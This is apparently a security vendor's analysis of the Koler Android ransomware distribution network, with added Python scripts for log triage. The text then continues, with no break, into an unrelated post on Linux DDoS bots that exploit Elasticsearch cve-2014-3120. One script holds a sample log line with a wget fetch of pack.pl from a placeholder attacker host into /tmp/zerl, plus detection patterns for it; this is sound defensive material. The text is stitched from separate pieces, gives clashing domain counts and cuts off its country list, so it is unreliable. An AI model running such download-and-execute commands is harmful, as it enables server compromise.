At the beginning of May 2014 a security researcher named Kaffeine made the first public mention of Trojan.AndroidOS.Koler.a, a ransomware program that blocks the screen of an infected device and requests a ransom of between $100 and $300 in order to unlock the device. It doesn't encrypt any files or perform any kind of advanced blocking of the target device other than blocking the screen.
The malware displays a localized message from the police!
It has customized messages for the following countries: Australia
As of July 23, the mobile part of the campaign has been disrupted and the Command and Control server has started sending an "Uninstall" request to victims.
In this post, instead of focusing on the mobile application itself (we highlight some details at the end), we want to shed light on its distribution infrastructure: an entire network of malicious porn sites linked to a traffic direction system that redirects visitors to different payloads, targeting not only mobile devices but any other visitor as well. That includes redirections to browser-based ransomware and to what we think is an "Angler" exploit kit distribution network.
The diagram below illustrates the bigger picture of the infrastructure used.
The main findings can be summarized as follows:
- Distribution: TDS (Traffic Distribution System)
- Main controller: video-sartex.us (TDS Controller)
- Malicious porn sites (redirector): 49 domains detected
- Exploit kit websites: 700+ URLs (200+ domains)
- Browser-based screen-lock domains: 49 domains detected
- Mobile infection domain: video-porno-gratuit.eu
- Mobile Current C2: policemobile.biz.
- Traffic: almost 200,000 visitors to the mobile infection domain
- 80% of visitors from the US
The use of a pornographic network for this "police" ransomware is no coincidence: the victims are more likely to feel guilty about browsing such content and pay the alleged fine from the authorities. This psychological factor can be the difference between a failed campaign and a successful one.
With regards to the malicious mobile application, we have found different APKs with the same behavior. Some of them (not yet distributed through this malicious network) have interesting names such as PronHub.com.Apk, whatsapp.apk or updateflash.apk.
This suggests the attackers could expand their campaign in the near future.
Mobile payload distribution
The mobile infection is triggered when the user visits specific pornographic sites from an Android device. Those sites are part of the distribution network created for this campaign and will redirect the victims to a landing page that contains an APK file called animalporn.apk.
All the porn sites in the campaign redirect their traffic to the same server: hxxp://video-porno-gratuit.eu. This domain hosts the malicious APK.
When visited, the website automatically redirects the user to the malicious application. The user still has to confirm the download and installation of the application on their device.
We were able to obtain the statistics showing the geographical distribution of visitors to this malicious site:
According to the same stats, we see that the campaign started and reached peak activity in April 2014.
Redirectors: The malicious porn network
The pornographic sites of the network are not compromised sites. They all look the same, share the same HTML structure and don't provide their own pornographic material.
We identified a total of 48 domains in this porn redirecting network.
Almost all the websites used in this infrastructure were created using the same template – in many cases using templates from the legitimate site Tubewizardpro and Webloader for the external resources.
All the content (mainly videos and pictures) on these porn sites is loaded from external sources using Webloader.
Basically, all the porn sites redirect to the "controller" domain videosartex.us.
Videosartex.us then performs a redirect based on the parameter in the URL, the referrer, the user agent and the geographical location of the visitor's IP.
If the IP belongs to any of the 30 affected countries and the user-agent belongs to an Android device, the visitor is redirected to the APK at video-porno-gratuit.eu.
In other cases, the user is redirected either to another porn site in the network, to a screen-locker or to an exploit kit. The attackers use Keitaro TDS (Traffic Distribution System) to redirect users.
Non-mobile payloads
During our analysis we noticed that some domains showed ransomware-themed pop-ups to non-mobile victims. These additional servers are used when the controller (videosartex) detects the following two conditions:
- The request contains no Internet Explorer user agent.
- The request is from one of the 30 affected countries, but it doesn't contain an Android user agent.
In this case, the victim is redirected to any of the browser ransomware websites, while a blocking screen identical to the one used for mobiles is displayed on the victim's computer. There is no infection in this case, just a pop-up showing a blocking template.
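The routing rules above (Android from an affected country to the APK landing page, other browsers from an affected country to the browser screen-locker, Internet Explorer to the exploit kit branch) make it possible to triage proxy logs after the fact and tell which exposure each client actually had. The following is an added example, not code from the original post: the log lines are constructed, the log layout and the country list beyond Australia are assumptions, and so is the choice to treat the Internet Explorer branch as independent of country, which the post does not state.

```python
"""Triage web proxy logs against the Koler redirection rules described above.

Added example, not code from the original post. The log lines are constructed;
the routing rules follow the post (Android client from an affected country ->
APK landing page, Internet Explorer -> exploit kit, any other browser from an
affected country -> browser screen-locker pop-up). The log format, the country
list and the assumption that the IE branch applies regardless of country are
this example's own.
"""
import re
from collections import Counter

# Hostnames and file name taken from the post.
TDS_CONTROLLER = "videosartex.us"
APK_HOST = "video-porno-gratuit.eu"
APK_NAME = "animalporn.apk"

# The post says 30 countries are targeted and names only Australia; the other
# entries here are placeholders so the sample data exercises every branch.
AFFECTED_COUNTRIES = {"AU", "US", "GB", "DE", "FR"}

# Assumed line layout: <timestamp> <client_ip> <country> <host> <path> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<cc>[A-Z]{2}) (?P<host>\S+) (?P<path>\S+) "(?P<ua>[^"]*)"$'
)


def classify_ua(ua):
    """Bucket a user agent the way the post says the controller does."""
    if "Android" in ua:
        return "android"
    if "MSIE" in ua or "Trident/" in ua:
        return "ie"
    return "other"


def expected_branch(country, ua):
    """Payload branch the controller would route this visitor to (per the post)."""
    kind = classify_ua(ua)
    if kind == "ie":
        return "exploit_kit"          # Angler landing page
    if country in AFFECTED_COUNTRIES:
        return "apk" if kind == "android" else "browser_locker"
    return "porn_site"                # bounced to another site in the network


def triage(lines):
    """Per client IP: the branch it was routed down and whether the APK was fetched."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                  # skip lines that do not fit the assumed format
        ip, cc, host, path, ua = m.group("ip", "cc", "host", "path", "ua")
        rec = findings.setdefault(ip, {"client": classify_ua(ua),
                                       "branch": None, "apk_fetched": False})
        if host == TDS_CONTROLLER:
            rec["branch"] = expected_branch(cc, ua)
        elif host == APK_HOST and path.endswith(APK_NAME):
            rec["apk_fetched"] = True  # download reached; install still needs user consent
    return findings


def needs_followup(findings):
    """IPs that fetched the APK or were sent to the exploit kit. The screen-locker
    branch is a pop-up only, so it ranks lower."""
    return sorted(ip for ip, r in findings.items()
                  if r["apk_fetched"] or r["branch"] == "exploit_kit")


def branch_counts(findings):
    """How many clients went down each branch."""
    return Counter(r["branch"] for r in findings.values())


# Constructed sample traffic: one Android victim, one IE user, one desktop
# Firefox user in an affected country, one Android user outside the list.
SAMPLE_LOG = [
    '2014-05-01T10:00:01Z 10.0.0.5 US videosartex.us /?k=a "Mozilla/5.0 (Linux; Android 4.4; Nexus 5) AppleWebKit/537.36"',
    '2014-05-01T10:00:02Z 10.0.0.5 US video-porno-gratuit.eu /animalporn.apk "Mozilla/5.0 (Linux; Android 4.4; Nexus 5) AppleWebKit/537.36"',
    '2014-05-01T10:01:00Z 10.0.0.6 US videosartex.us /?k=b "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"',
    '2014-05-01T10:02:00Z 10.0.0.7 GB videosartex.us /?k=c "Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0"',
    '2014-05-01T10:03:00Z 10.0.0.8 BR videosartex.us /?k=d "Mozilla/5.0 (Linux; Android 4.2; GT-I9300) AppleWebKit/534.30"',
]

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for ip, rec in result.items():
        print(ip, rec)
    print("branches:", dict(branch_counts(result)))
    print("follow up:", needs_followup(result))
```

The point of ranking is that a hit on the controller alone proves only a redirect; the APK fetch and the exploit kit branch are the two outcomes that warrant looking at the endpoint, while the screen-locker branch, as the post notes, involves no infection.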
The following images are examples of the headers used in the ransomware pop-ups:
The redirection infrastructure used in this campaign contained one final surprise: visitors using Internet Explorer are redirected to sites hosting the Angler exploit kit, which has exploits for Silverlight, Adobe Flash and Java.
The following is an example of such a redirection:
We detected more than 200 domains used for hosting this exploit kit.
During our analysis, the exploit code was not fully functional and it didn't deliver any payload.
Conclusions
Ransomware for mobile devices appeared on almost every prediction list for 2014. We are not dealing here with the most advanced families, such as CryptoLocker for Windows. The ransomware is fairly basic, but sufficient to annoy the victim.
Of most interest is the distribution network used in the campaign. Dozens of automatically generated websites redirect traffic to a central hub where users are redirected again. Depending on a number of conditions, this second redirection could be to a malicious Android application, to browser-based ransomware or to a website with the Angler Exploit Kit.
We believe this infrastructure demonstrates just how well organized and dangerous the campaigns currently targeting Android users (but not limited to them) are. Thanks to full automation, the attackers can quickly create similar infrastructure, changing the payload or targeting different users. They have also thought up a number of ways of monetizing their campaign in a truly multi-device scheme.
A couple of weeks ago, my colleague Mikhail K posted on the "versatile linux DDoS trojan", with analysis of several bots, including one implementing some extraordinary DNS amplification DDoS functionality. The operators of these bots are currently active, and we observe new variants of the trojan building bigger botnets.
Let's explore some additional details of this crew's offensive activity, and of the overall situation, over the past week. In general, the DDoS trojans are being distributed to fire on victims whose profiles seem to indicate purely cybercrime activity. The compromised hosts we observed running the bots have been Amazon EC2 instances, but of course this platform is not the only one being attacked and misused. It is also interesting that the operators of this botnet apparently have no problem working with CN sites, as demonstrated by their use of the site hosting their tools since late 2013. Seven of their eight tools hosted there were uploaded in the past couple of weeks, coinciding with their updated attack activity. Their repository includes recent (cve-2014-0196) and older (cve-2012-0056) Linux privilege escalation exploit source code, likely compiled on the compromised hosts only when higher privileges are necessary, along with compiled offensive SQL tools (Backdoor.Linux.Ganiw.a), multiple webshells (Backdoor.Perl.RShell.c and Backdoor.Java.JSP.k) and two new variants of the "versatile bots" (Backdoor.Linux.Mayday.g), the UDP-only "xudp" code being the newer of the two:
But first, how are they getting into EC2 instances and running their Linux DDoS bots from the cloud? They are actively exploiting a known, recent Elasticsearch vulnerability in all versions 1.1.x (cve-2014-3120), which happens to still be in active commercial deployment for some organizations. If you are still running 1.1.x, upgrade to the latest 1.2 or 1.3 release, released a couple of days ago: dynamic scripting is disabled by default there, and other features were added to help ease the migration. From a couple of incidents involving Amazon EC2 customers whose instances were compromised by these attackers, we were able to capture very early stages of the attacks. The attackers re-purpose known cve-2014-3120 proof-of-concept exploit code to deliver a Perl webshell that Kaspersky products detect as Backdoor.Perl.RShell.c. Linux admins can scan for these malicious components with our server product.
Gaining this foothold gives the attacker bash shell access on the server. The script "pack.pl" is fetched with wget from the web host above, saved to /tmp/zerl and run from there, providing the bash shell access to the attacker. Events like these in your index logs may indicate that your server has fallen to this attack:
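Two checks follow directly from the paragraphs above: whether a node is still on the 1.1.x line with dynamic scripting enabled, and whether the index logs carry the pack.pl fetch or the /tmp/zerl drop path. The code below is an added example, not code from the original post or from Elasticsearch; `script.disable_dynamic` is the real 1.x elasticsearch.yml setting that switches dynamic scripting off, while the config fragments, the log lines and their layout are constructed, and the attacker host in the sample line is a placeholder.

```python
"""Check an Elasticsearch 1.x node's exposure to cve-2014-3120 and scan its logs
for the post-exploitation indicators named above.

Added example, not code from the original post. `script.disable_dynamic` is the
real 1.x elasticsearch.yml setting that switches dynamic scripting off; the
config fragments, the log lines and their layout are constructed.
"""
import re

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(v):
    """'1.1.2' -> (1, 1, 2); anything else is rejected rather than guessed."""
    m = VERSION_RE.match(v)
    if not m:
        raise ValueError("unrecognised version string: %r" % v)
    return tuple(int(p) for p in m.groups())


def is_1_1_line(version):
    """The 1.1.x line the post says is being exploited."""
    return parse_version(version)[:2] == (1, 1)


def dynamic_scripting_enabled(yaml_text, version):
    """True if the node would accept dynamic scripts.

    Only the flat `script.disable_dynamic: <value>` form is parsed. If the key is
    absent, the default applies: off from 1.2 onwards (as the post notes),
    on before that.
    """
    for raw in yaml_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        m = re.match(r"script\.disable_dynamic\s*:\s*(\S+)", line)
        if m:
            return m.group(1).strip('"\'').lower() != "true"
    return parse_version(version)[:2] < (1, 2)


def assess(version, yaml_text):
    """Summarise exposure and the single remediation the post recommends."""
    affected = is_1_1_line(version)
    enabled = dynamic_scripting_enabled(yaml_text, version)
    return {
        "version": version,
        "affected_line": affected,
        "dynamic_scripting": enabled,
        "exposed": affected and enabled,
        "action": ("upgrade to the latest 1.2 or 1.3 release"
                   if affected else "no version action needed"),
    }


# Indicators named in the post: pack.pl fetched with wget and dropped at /tmp/zerl.
IOC_PATTERNS = {
    "pack.pl fetch": re.compile(r"\bwget\b.*pack\.pl"),
    "zerl dropper path": re.compile(r"/tmp/zerl\b"),
}


def scan_log(lines):
    """Return (line number, indicator name) for every log line matching an indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, pat in IOC_PATTERNS.items():
            if pat.search(line):
                hits.append((n, name))
                break                              # one finding per line is enough
    return hits


# Constructed config fragments: the weak one relies on the 1.1.x default.
WEAK_YAML = """\
cluster.name: prod-search
# nothing about scripting here, so on 1.1.x dynamic scripting stays on
"""
HARDENED_YAML = """\
cluster.name: prod-search
script.disable_dynamic: true   # refuse dynamic scripts regardless of version
"""

# Constructed log lines; the host in the wget line is a placeholder.
SAMPLE_LOG = [
    "[2014-07-18 03:12:44,101][INFO ][node] [node-1] started",
    "[2014-07-18 03:15:02,337][WARN ][index.search.slowlog.query] [node-1] took[2.1s], "
    "source[... wget http://ATTACKER-HOST-PLACEHOLDER/pack.pl -O /tmp/zerl ...]",
    "[2014-07-18 03:15:03,004][INFO ][cluster.service] [node-1] routing table updated",
]

if __name__ == "__main__":
    print(assess("1.1.2", WEAK_YAML))
    print(assess("1.1.2", HARDENED_YAML))
    print(assess("1.3.0", ""))
    print(scan_log(SAMPLE_LOG))
```

Setting `script.disable_dynamic: true` closes the hole on a 1.1.x node that cannot be upgraded immediately, but it is a stopgap; the upgrade the post recommends is still the fix, and a log hit on either indicator means the node should be treated as compromised rather than merely exposed.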
Hosted on the same remote server and fetched via the Perl webshell are the DDoS bots carrying new encrypted C2 strings, detected as Backdoor.Linux.Mayday.g. One of the variants includes the DNS amplification functionality described in Mikhail's previous post. Oddly enough, though, the variant in use on the compromised EC2 instances was flooding sites with UDP traffic only. The flow is strong enough that the DDoS'd victims were forced to move from their normal hosting IP addresses to those of an anti-DDoS solution. The flow is also strong enough that Amazon is now notifying its customers, probably because of the potential for an unexpected accumulation of excessive resource charges. The situation is probably similar at other cloud providers. The list of DDoS victims includes a large regional US bank and a large electronics maker and service provider in Japan, indicating the perpetrators are likely your standard financially driven cybercrime ilk.